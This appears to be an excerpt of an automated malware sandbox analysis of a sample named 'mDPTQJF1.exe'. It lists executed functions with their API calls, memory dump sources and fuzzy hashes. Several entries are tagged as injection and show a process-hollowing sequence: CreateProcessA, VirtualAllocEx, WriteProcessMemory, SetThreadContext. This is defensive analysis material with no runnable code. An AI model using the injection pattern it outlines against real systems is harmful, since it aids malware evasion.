Instruction Fuzzy Hash: 1611F0B69046498FCB10CF9AD584B9EFBF4EB88324F1484AAD829B7200D775A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02A14348, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 02A143B6

Memory Dump Source

Source File: 00000001.00000002.502115807.0000000002A10000.00000040.00000001.sdmp, Offset: 02A10000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c94018b1408dd703a63dc03802e0e2b0307e4ad86cff1e79eda2e60ac7d7711f
Instruction ID: 5d1e809ec1130cc0cf2aecb84bf3e58f872e4e2d05c352540bf8dbc7cfd49599
Opcode Fuzzy Hash: c94018b1408dd703a63dc03802e0e2b0307e4ad86cff1e79eda2e60ac7d7711f
Instruction Fuzzy Hash: 8E1132B5C002498FCB10CF9AD584BDEFBF4AB88324F14845AC459B7200C334A54ACFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010E9E80, Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010E9F1E

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 8ec2d7fd5b5df56b7656d168404647287ae5ee07fa099ed367ad40c4f5fdc8c6
Instruction ID: 7af7d34d50b3fc6573dc0e66876901da20006f60caf08d8fdefca61b33190521
Opcode Fuzzy Hash: 8ec2d7fd5b5df56b7656d168404647287ae5ee07fa099ed367ad40c4f5fdc8c6
Instruction Fuzzy Hash: D7F0CD39B401168FCB40CF58DC818CC73F1FB88264304407AD80ED7702DB349C0A87A0

Uniqueness

Uniqueness Score: -1.00%

Function 010EA027, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010EA03E

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: b3c3d139789b8e2748a8fa85108057cc7932732aff2ff2b62083ad2178e2d73f
Instruction ID: 5fc7354185a5d089658672e079b7aba10c058e88ea8a5c0f69b630c3f3254727
Opcode Fuzzy Hash: b3c3d139789b8e2748a8fa85108057cc7932732aff2ff2b62083ad2178e2d73f
Instruction Fuzzy Hash: 45E06539B000148B8F40FBB8E8549DC73E2FF8C324B008061E10AE3764EE34AC068B61

Uniqueness

Uniqueness Score: -1.00%

Function 010E8D67, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010E8D7E

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: a01fa1f0f786b68ceb6b31295af20cc0f318b87467d226ad5aa39505efc3343f
Instruction ID: ff7bc00b968a775f4c48b4446996b62ab46bf26349abef2ce5846a54fb49fc7a
Opcode Fuzzy Hash: a01fa1f0f786b68ceb6b31295af20cc0f318b87467d226ad5aa39505efc3343f
Instruction Fuzzy Hash: 06E06539B010148F8F00FBB8E8459DDB3E2FF883247008061E90AE3754DE349C068BA1

Uniqueness

Uniqueness Score: -1.00%

Function 010E9F07, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010E9F1E

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: c1de834b8a618cc6801eec9b2d3d0ef4b6bb886ec019ca8d0ab9f4c884cfb984
Instruction ID: 5359857698d9e0b6cc0e3f4cf188ff90c52d42408d9a7cac795d29f4624dca46
Opcode Fuzzy Hash: c1de834b8a618cc6801eec9b2d3d0ef4b6bb886ec019ca8d0ab9f4c884cfb984
Instruction Fuzzy Hash: 63E06539B001149B8F40EBB8E8448DD73E2FF883247008061E10AE3754DE349C068BA1

Uniqueness

Uniqueness Score: -1.00%

Function 010E97C7, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010E97DE

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 94ecfac75693de8afea51b76571b29e2910bfad0f7fe7183426d8ee02849ab8d
Instruction ID: d63f07270b1c72e9818276aff758f70a4833a4ae3d1515124073ec8f02fc0b30
Opcode Fuzzy Hash: 94ecfac75693de8afea51b76571b29e2910bfad0f7fe7183426d8ee02849ab8d
Instruction Fuzzy Hash: B1E06539B010189B8F40EBB8E8548DC73E2FF8C3247008061E10AE3364EE349C068B61

Uniqueness

Uniqueness Score: -1.00%

Function 010E2FD7, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010E2FEE

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 0fb0ad4582d2fd4b33088639b9c0318562cc5d135511768eff2b86fdee9e005f
Instruction ID: 041ec5a4b6563a8d4d65a45e704b3e263124de21a44259e04c690b5ad6322fca
Opcode Fuzzy Hash: 0fb0ad4582d2fd4b33088639b9c0318562cc5d135511768eff2b86fdee9e005f
Instruction Fuzzy Hash: 4CE0E539B001149B8F40FBB8E8559DD73E2FF883247108065E54AE7765EE359D468B61

Uniqueness

Uniqueness Score: -1.00%

Function 010E8E87, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SetWindowLongPtrA.USER32 ref: 010E8E9E

Memory Dump Source

Source File: 00000001.00000002.501359993.00000000010E0000.00000040.00000001.sdmp, Offset: 010E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: b4694384b4af02d410b533aa7d243d6c829c34e82ca898da727198675afe3bc1
Instruction ID: 44477755c4f056e819d685e1220f4ed8ff6e9820938c73c70d1039da4d43915f
Opcode Fuzzy Hash: b4694384b4af02d410b533aa7d243d6c829c34e82ca898da727198675afe3bc1
Instruction Fuzzy Hash: 1EE0E539B001189B8F40EBB8E8559DD73F2FF883247048065E54AE7795DE34AD468B61

Uniqueness

Uniqueness Score: -1.00%

Function 00E9D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.499901056.0000000000E9D000.00000040.00000001.sdmp, Offset: 00E9D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fff9d633dd8ea35cea42015b7be1f6c87f260374092f2bd3ec97af339e01754e
Instruction ID: 21d299122639d01dc6a016adadfd3db2d2ef9af8330612bafdd1ca4a342b30fb
Opcode Fuzzy Hash: fff9d633dd8ea35cea42015b7be1f6c87f260374092f2bd3ec97af339e01754e
Instruction Fuzzy Hash: 8221F571508344DFDF14DF24D9C4B26BB66FB84318F24C9A9D9095B246C33AD847CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00E9D005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.499901056.0000000000E9D000.00000040.00000001.sdmp, Offset: 00E9D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf4969a9845dc8da0192fe45ebd5da8d62f513c42192ddcedb795fc46f7a23ca
Instruction ID: 450faa502d6aa9d07c7fcf9e8fa278e46aca57f267a81e2d90939064f19078e7
Opcode Fuzzy Hash: cf4969a9845dc8da0192fe45ebd5da8d62f513c42192ddcedb795fc46f7a23ca
Instruction Fuzzy Hash: 4A21927550D3C08FCB12CF24D990715BF71EB46314F28C5EAD8498B697C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: mDPTQJF1.exe PID: 4652 Parent PID: 3472 mDPTQJF1.exeCOMMON

Executed Functions

Function 024F27DC, Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 024F2A1E

Memory Dump Source

Source File: 0000000F.00000002.320971914.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 34ad470a1bf23b9db133b0f481fb5672fda73a6b1a545e418a556c933741c364
Instruction ID: 7272357ff91749464f2a0ddfbe160924bd2366a0a7096b7fe9a477a2366b7ed2
Opcode Fuzzy Hash: 34ad470a1bf23b9db133b0f481fb5672fda73a6b1a545e418a556c933741c364
Instruction Fuzzy Hash: 3BA15C71D043198FEB64CF64C941BEEBBB2BF88314F0485AAD949A7340DBB49985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 024F27E8, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 024F2A1E

Memory Dump Source

Source File: 0000000F.00000002.320971914.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 80a560d7946700c83f8e28216e9a010a0e069d02abb423440fecd8b50a397b6c
Instruction ID: d98e0b8d10d9833131a819427baae02571b0fce2a0fae4ca0ffd0fde97ff39e2
Opcode Fuzzy Hash: 80a560d7946700c83f8e28216e9a010a0e069d02abb423440fecd8b50a397b6c
Instruction Fuzzy Hash: 19914B71D042198FEB64CF64C941BDEBBB2BF88314F1485AAD909A7340DBB49985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00BCBBC8, Relevance: 1.7, APIs: 1, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.320729561.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3046326e4446f87d002070820f542bf3d65fd3c9aa7be4b19ea1b64060eb03ee
Instruction ID: 20f87289f703e83964844512e0a909a2287f47b8378a546047a98d21c90352f7
Opcode Fuzzy Hash: 3046326e4446f87d002070820f542bf3d65fd3c9aa7be4b19ea1b64060eb03ee
Instruction Fuzzy Hash: A1712270A00B058FDB24DF6AD155B5ABBF5FF88304F008A6DD486D7A40DB35E8458F91

Uniqueness

Uniqueness Score: -1.00%

Function 00BCB0E0, Relevance: 1.6, APIs: 1, Instructions: 129COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00BCDD8A

Memory Dump Source

Source File: 0000000F.00000002.320729561.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e5dc88a0ad74066956116e5e9ca250a42fc5f329159df6f4d5b09f42e46275bc
Instruction ID: 6fa220a2030ca26b656ae906c40d854c87ce6477fbd994c2b52ca5782e80670d
Opcode Fuzzy Hash: e5dc88a0ad74066956116e5e9ca250a42fc5f329159df6f4d5b09f42e46275bc
Instruction Fuzzy Hash: 9E51FFB5D043499FDB14CFA9C984ADEBBB5FF48314F24826AE809AB210D7709885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00BCB0FC, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00BCDD8A

Memory Dump Source

Source File: 0000000F.00000002.320729561.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 45470ea2c7df551d89bfb8978950d77d52edebbcc91a62c02793e1d243ffaa8a
Instruction ID: 4b6152d89bc2cf00e4a5f1efdcdf46f94918f5859254fb2bce7411bec21bcba0
Opcode Fuzzy Hash: 45470ea2c7df551d89bfb8978950d77d52edebbcc91a62c02793e1d243ffaa8a
Instruction Fuzzy Hash: E351BDB5D103099FDB14CF99C984ADEBBF5FF88314F24826AE819AB210D7749885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00BCDC6D, Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00BCDD8A

Memory Dump Source

Source File: 0000000F.00000002.320729561.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 1e575dcf6f129e9c4cf0b2f2da887e7ec43da38618394a1a66dbf7b0a43a4210
Instruction ID: 59d20bd02cead0a855a0da8c094b4733b3370e31dd8c6b215c6964ba6aa8a929
Opcode Fuzzy Hash: 1e575dcf6f129e9c4cf0b2f2da887e7ec43da38618394a1a66dbf7b0a43a4210
Instruction Fuzzy Hash: 7E51BDB5D103099FDB14CF99C984ADEBBB2FF88314F24812AE819AB210D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04C02D1D, Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 04C03F51

Memory Dump Source

Source File: 0000000F.00000002.328357044.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 12952523ad8b9c9b9b086758227ce2f54d0411c13935b967c7890a16ce6c99fe
Instruction ID: 6a22cfe848971e53e33c4d9c8d1c8c767bb58be1d3104c7975dbf2f94290d714
Opcode Fuzzy Hash: 12952523ad8b9c9b9b086758227ce2f54d0411c13935b967c7890a16ce6c99fe
Instruction Fuzzy Hash: 40411571C04658CFDB14DFA9C984BCEBBB5BF48308F1480AAD509AB261DB716949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00BC6D49, Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00BC6D86,?,?,?,?,?), ref: 00BC6E47

Memory Dump Source

Source File: 0000000F.00000002.320729561.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2f59a156724093d8be666339c3e28b88a957886acd0c103dc96af69ee11264b8
Instruction ID: 9c586ee3508bb95293779da4ce7ef1efa8616f0a6fb579d809239e6847063197
Opcode Fuzzy Hash: 2f59a156724093d8be666339c3e28b88a957886acd0c103dc96af69ee11264b8
Instruction Fuzzy Hash: 41414876900208AFDB01CF99D944ADEBFF9FB48324F14806AE944A7360C335A954DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 024F2378, Relevance: 1.6, APIs: 1, Instructions: 101threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 024F2446

Memory Dump Source

Source File: 0000000F.00000002.320971914.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: da10514e1dc7ac731038ce08112f1213384de85fdc29e0506ce7a8f25701b043
Instruction ID: 8ee566b1cd9d43d50ed4340772bb189ac6a33851ae99ad5122bacf9089f04593
Opcode Fuzzy Hash: da10514e1dc7ac731038ce08112f1213384de85fdc29e0506ce7a8f25701b043
Instruction Fuzzy Hash: 5E31C0719046888FCB11CF68C8917EEFFF0EF85229F09885EC484AB601D778A949CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04C02D34, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 04C03F51

Memory Dump Source

Source File: 0000000F.00000002.328357044.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 9fce9a82c6fb265f6e0c5e5d9701c547b8764cd7c6124f1d7e95ad4615b92888
Instruction ID: 58876a040de52b56dc9d4febe74b21b6b7d59753c1ccc8c810d7bd34ba3d1bbb
Opcode Fuzzy Hash: 9fce9a82c6fb265f6e0c5e5d9701c547b8764cd7c6124f1d7e95ad4615b92888
Instruction Fuzzy Hash: 1D411571C04659CFDB24DF99C98479EFBB6BF48304F148059D809BB260DB716949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04C03E94, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 04C03F51

Memory Dump Source

Source File: 0000000F.00000002.328357044.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 9031281ee958a38c94c2b3d6c4b92b2e34c3016a911716481a7f78683cefd75e
Instruction ID: fa0f9d330f9bb264c2558574b546b92f95ae5b4bce39089af8d61475b6d177fa
Opcode Fuzzy Hash: 9031281ee958a38c94c2b3d6c4b92b2e34c3016a911716481a7f78683cefd75e
Instruction Fuzzy Hash: 214104B1C04659CFDB14DF99C98478EFBB5BF48308F148059D909BB260DB70694ACF50

Uniqueness

Uniqueness Score: -1.00%

Function 04C00CD0, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04C00D91

Memory Dump Source

Source File: 0000000F.00000002.328357044.0000000004C00000.00000040.00000001.sdmp, Offset: 04C00000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 63e68fe29f6ebcfe1eb1bdd8f9c79ef2fcfb5bd82d6364d2dd6853a6d631be2e
Instruction ID: 40a2d9d5bcf896c217d22ddf0f80a2b078062d832482794845964b274d44314c
Opcode Fuzzy Hash: 63e68fe29f6ebcfe1eb1bdd8f9c79ef2fcfb5bd82d6364d2dd6853a6d631be2e
Instruction Fuzzy Hash: 894149B4A00305CFDB14CF9AD488BAABBF5FB88314F25C459E519AB361D374A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 024F2558, Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 024F25F0

Memory Dump Source

Source File: 0000000F.00000002.320971914.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c6346851797721c4ee5d30cb966b3de52ce2d79d2157b1f12efca3fdfba4f885
Instruction ID: c3f75a784118eda59941bb8ecf3fa080c396dd728930118774d9a6b26242c6ab
Opcode Fuzzy Hash: c6346851797721c4ee5d30cb966b3de52ce2d79d2157b1f12efca3fdfba4f885
Instruction Fuzzy Hash: DF2148B59003499FCB10CFA9C9847DEBBF5BF88318F44842AE959A7341D7789944DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 024F2560, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 024F25F0

Memory Dump Source

Source File: 0000000F.00000002.320971914.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8747919dc8b438175bdeb8b9f5428efa6502ce833f5b8cad6ed9ed2977c12d7d
Instruction ID: 6a9947928a7d8410f228a313d7708108e74aa00fe83b154d3617a02d9899c65f
Opcode Fuzzy Hash: 8747919dc8b438175bdeb8b9f5428efa6502ce833f5b8cad6ed9ed2977c12d7d
Instruction Fuzzy Hash: EF2127759003599FCB10CFA9C984BDEBBF5FF88314F14842AE919A7340D7789944DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BC6DB8, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00BC6D86,?,?,?,?,?), ref: 00BC6E47

Memory Dump Source

Source File: 0000000F.00000002.320729561.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 386afc977b6ec239749ea9c04e70e199ae19123fcee39410201251811b63bae6
Instruction ID: f1056e557b95183484531773c8d9a0dae6b0a1bbc2db10c6f498e4464d2dbdd2
Opcode Fuzzy Hash: 386afc977b6ec239749ea9c04e70e199ae19123fcee39410201251811b63bae6
Instruction Fuzzy Hash: 1B21D2B59002099FDB10CFAAD984ADEBBF8EB48324F14845AE954A3210D374A955CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BC5864, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00BC6D86,?,?,?,?,?), ref: 00BC6E47

Memory Dump Source

Source File: 0000000F.00000002.320729561.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 40f179b071fc86af12a4387de2bad3fbfd4e7a9cb229601239a05f7ce85e54fc
Instruction ID: 48bdc43aa731de8e13c60e7261b2dc7bc1b92a481e06e91b08d486b5e2e391c0
Opcode Fuzzy Hash: 40f179b071fc86af12a4387de2bad3fbfd4e7a9cb229601239a05f7ce85e54fc
Instruction Fuzzy Hash: A921F4B59002099FDB10CF9AD584BDEBBF8EB48324F14845AE914B3210D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 024F2649, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 024F26D0

Memory Dump Source

Source File: 0000000F.00000002.320971914.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 11c3a122c2ac51861d0168470ad71891f586c3f02a62f4ad8031c1f220cd1076
Instruction ID: a8cdf36491852f304b409b69f18264658bfa087f2956c9221ac732fbeb19f2c4
Opcode Fuzzy Hash: 11c3a122c2ac51861d0168470ad71891f586c3f02a62f4ad8031c1f220cd1076
Instruction Fuzzy Hash: 23214AB59043499FCB10CFA9C9807DEBBF4BF88324F14842EE958A7240D7789944DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 024F2650, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 024F26D0

Memory Dump Source

Source File: 0000000F.00000002.320971914.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: cb3646feefabba1655429345ff3a01f61c6364028ea3f0a58851f9dfcb3c27bd
Instruction ID: 0f487ca0d88ff6da8826779ac735a0c5b862b6265c336c8f399698ad87b2d9f9
Opcode Fuzzy Hash: cb3646feefabba1655429345ff3a01f61c6364028ea3f0a58851f9dfcb3c27bd
Instruction Fuzzy Hash: E72128719043099FCB10CFA9C984BDEBBF5FF88314F50842AE918A7240D7749944DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 024F23C8, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 024F2446

Memory Dump Source

Source File: 0000000F.00000002.320971914.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 7b0b57bdfedd53c640f273c66465cf3cfff1c23af322f6d70accf2047cc099b6
Instruction ID: 17290e46f397ff2f3643d50bb74800ad850c1ab12a1e5db77349a962d7d2a62f
Opcode Fuzzy Hash: 7b0b57bdfedd53c640f273c66465cf3cfff1c23af322f6d70accf2047cc099b6
Instruction Fuzzy Hash: F4213A719043098FCB10DFAAC5847EFBBF4EF88318F14842AD959A7240DB789945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BCAFC0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00BCBE89,00000800,00000000,00000000), ref: 00BCC09A

Memory Dump Source

Source File: 0000000F.00000002.320729561.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e847b86c7d2f04cf9f79e95b4e6e704de223373a7c77aaa9faeeba687d381da2
Instruction ID: ca156ce6d974a2646e722291ce7279ea3dc50bb797d2c7348b4b3d0be4026493
Opcode Fuzzy Hash: e847b86c7d2f04cf9f79e95b4e6e704de223373a7c77aaa9faeeba687d381da2
Instruction Fuzzy Hash: 641122B6904208CBCB10CF9AC444B9EBBF4EB88324F14846ED819B7200C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BCC028, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00BCBE89,00000800,00000000,00000000), ref: 00BCC09A

Memory Dump Source

Source File: 0000000F.00000002.320729561.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ad2c8acb6741e0afa23f822425a12be0b5b04aadc70f11e0e5c37103c2ea0f54
Instruction ID: 06c1e083c9a2f6f2242b103e83b33d3beb3d153cf64220530f9f21b473b09da9
Opcode Fuzzy Hash: ad2c8acb6741e0afa23f822425a12be0b5b04aadc70f11e0e5c37103c2ea0f54
Instruction Fuzzy Hash: AC11F2B6900209CBCB10CF9AC544BDEFBF8EB88324F14856ED919A7200C375A949CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 024F24A0, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 024F250E

Memory Dump Source

Source File: 0000000F.00000002.320971914.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0360d796eab5d6b2edb891fc978baa103090d6bbb5b66b360a0a5fb002b6c3a3
Instruction ID: 1d9d9e24a1021d9eca94e474976f9bf4e6dd3d248af4830fcd220f3ca1db6ad5
Opcode Fuzzy Hash: 0360d796eab5d6b2edb891fc978baa103090d6bbb5b66b360a0a5fb002b6c3a3
Instruction Fuzzy Hash: 781164759042089FCB10CFAAC944BDFBBF5EF88328F14881AEA15A7250D775A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 024F2499, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 024F250E

Memory Dump Source

Source File: 0000000F.00000002.320971914.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2a914a76138f24686f6e35dc20cdaa4b652ff0341ef3fa2a54ae3392063e4f03
Instruction ID: 75f180531f53ca8571768279d6dc72d83611dfc447649a67a31f717cf3e46046
Opcode Fuzzy Hash: 2a914a76138f24686f6e35dc20cdaa4b652ff0341ef3fa2a54ae3392063e4f03
Instruction Fuzzy Hash: CF1164769042488FCB10CFA9C9447EFBBF5AF88328F14881AE915A7250D775A948DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BCAF68, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,00BCBBDB), ref: 00BCBE0E

Memory Dump Source

Source File: 0000000F.00000002.320729561.0000000000BC0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f2884cf90817b2d5b8858c572ad7facf5f39ef0c5819393c1d5a5d727f3b91d0
Instruction ID: 70db351a124fd8066c3d9b902dfa59ec130f802d90f37212a24eb89382a1c53f
Opcode Fuzzy Hash: f2884cf90817b2d5b8858c572ad7facf5f39ef0c5819393c1d5a5d727f3b91d0
Instruction Fuzzy Hash: 1311F0B69046498FDB10CF9AC444BDEBBF8EB88324F14846ED919B7200D375A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 024F7370, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,024F7229,?,?), ref: 024F73D0

Memory Dump Source

Source File: 0000000F.00000002.320971914.00000000024F0000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
